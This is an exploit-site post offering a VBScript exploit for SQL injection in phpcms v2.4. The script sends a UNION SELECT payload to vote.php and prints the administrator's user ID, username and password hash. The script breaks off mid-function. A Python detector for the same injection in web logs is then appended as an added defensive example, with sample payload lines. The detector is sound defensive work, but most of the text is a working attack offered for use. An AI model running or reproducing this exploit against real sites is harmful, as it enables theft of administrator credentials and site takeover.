phpcms v2.4 SQL injection exploit

2011-06-12T00:00:00
ID MYHACK58:62201130836
Type myhack58
Reporter Anonymous
Modified 2011-06-12T00:00:00

Description

phpcms v2.4 SQL injection exploit. Antique-level old; the current release is already the 2011 version.

Ha. It seems this came out back in '09? A VBS version of the EXP, from "rural cattle". Take it if you need it.

on error resume next
Set objArgs = WScript.Arguments
dim my_http
dim my_path
dim fjhgx
print_r()
if objArgs.length = 0 then
    quit_print()
End if
if objArgs(0) = null then
    quit_print()
Else
    my_http = objArgs(0)
End if
if objArgs(1) = null then
    quit_print()
Else
    my_path = objArgs(1)
End if
Set Http = CreateObject("Microsoft.XMLHTTP")
Http.Open "get","http://"& my_http&my_path&"vote.php?action=result&voteid=999999.9+UNION+ALL+SELECT+(Select concat(0x7e,0x27,userid,0x27,username,0x27,password,0x7e,0x27) FROM phpcms_member where adminid=1 limit 0,1)+,1 2,1 2,1 2,1 2,1 2,1 2,1 2,1 2,1 2,1 2,1 2,1 2--",False
Http.Send
fjhgx = Zhuanhuan(Http.responsebody)
Set Http = Nothing
if InStr(fjhgx, "voteid=~'") Then
Else
    WScript.Echo "Exploit failed..."
    wscript.quit 'exit
End If
fjhgx = RegExpTest("WHERE voteid=~'.*~' ",fjhgx)
fjhgx = Replace(fjhgx,"WHERE voteid=~'","")
fjhgx = Replace(fjhgx,"~' ","")
dim fjhgx_b
fjhgx_b = Split(fjhgx,"'")
WScript.Echo "* [+] UserID : " & fjhgx_b(0)
WScript.Echo "* [+] Username : " & fjhgx_b(1)
WScript.Echo "* [+] Password : " & fjhgx_b(2)

Function print_r()
    WScript.Echo "+---------------------------------------------------------------------------+"
    WScript.Echo " phpcms v2.4 SQL injection exploit"
    WScript.Echo " test: Fjhgx I is rural."
    WScript.Echo "mail: bugtosafe@gmail.com"
    WScript.Echo " team: <http://www.wolvez.org>"
    WScript.Echo "+---------------------------------------------------------------------------+"
End Function

Function quit_print()
    WScript.Echo " Usage: CScript 1.vbs Url [Pre]"
    WScript.Echo " Example:"
    WScript.Echo " CScript 1.vbs localhost /"
    WScript.Echo " CScript 1.vbs localhost /phpcms_v2.4/"
    wscript.quit 'exit
End Function

'Create conversion function for converting the encoded
Function Zhuanhuan(vIn)
    strReturn = ""
    For i = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn,i,1))
        If ThisCharCode < &H80 Then
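A defender-side check for the request this script sends, as an added example that is not part of the original post: it scans web access-log lines for vote.php requests whose voteid parameter is anything other than a plain integer, decoding repeated URL encoding first. The combined log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request line of a combined-format access log entry; ".+?" tolerates raw spaces in the URL.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(?:union|select|concat|information_schema)\b|--|/\*|\b0x[0-9a-f]+", re.I)

def decode_fully(value):
    """Undo repeated URL encoding so %2555NION is inspected as UNION."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    return value

def classify_voteid(value):
    """voteid is a row id, so anything but a short run of digits is anomalous."""
    value = decode_fully(value)
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    return "sqli" if SQL_TOKENS.search(value) else "non-numeric"

def scan(lines):
    """Return (line_no, verdict, decoded voteid) for each anomalous vote.php request."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/vote.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("voteid", []):
            verdict = classify_voteid(raw)
            if verdict != "ok":
                findings.append((no, verdict, decode_fully(raw)))
    return findings

# Constructed sample lines (documentation addresses, shortened payloads).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jun/2011:10:00:01 +0800] "GET /vote.php?action=result&voteid=12 HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Jun/2011:10:00:05 +0800] "GET /phpcms_v2.4/vote.php?action=result&voteid=999999.9+UNION+ALL+SELECT+1,2-- HTTP/1.1" 200 733',
    '198.51.100.7 - - [12/Jun/2011:10:00:09 +0800] "GET /vote.php?action=result&voteid=1%2520%2555NION%2520%2553ELECT%25201 HTTP/1.1" 200 733',
    '192.0.2.44 - - [12/Jun/2011:10:01:00 +0800] "GET /vote.php?action=result&voteid=abc HTTP/1.1" 200 498',
    '192.0.2.44 - - [12/Jun/2011:10:01:02 +0800] "GET /search.php?q=union+select HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same digits-only rule applied to voteid on the server side, before the value reaches the query, is what closes the hole; the log scan only shows who has been probing it.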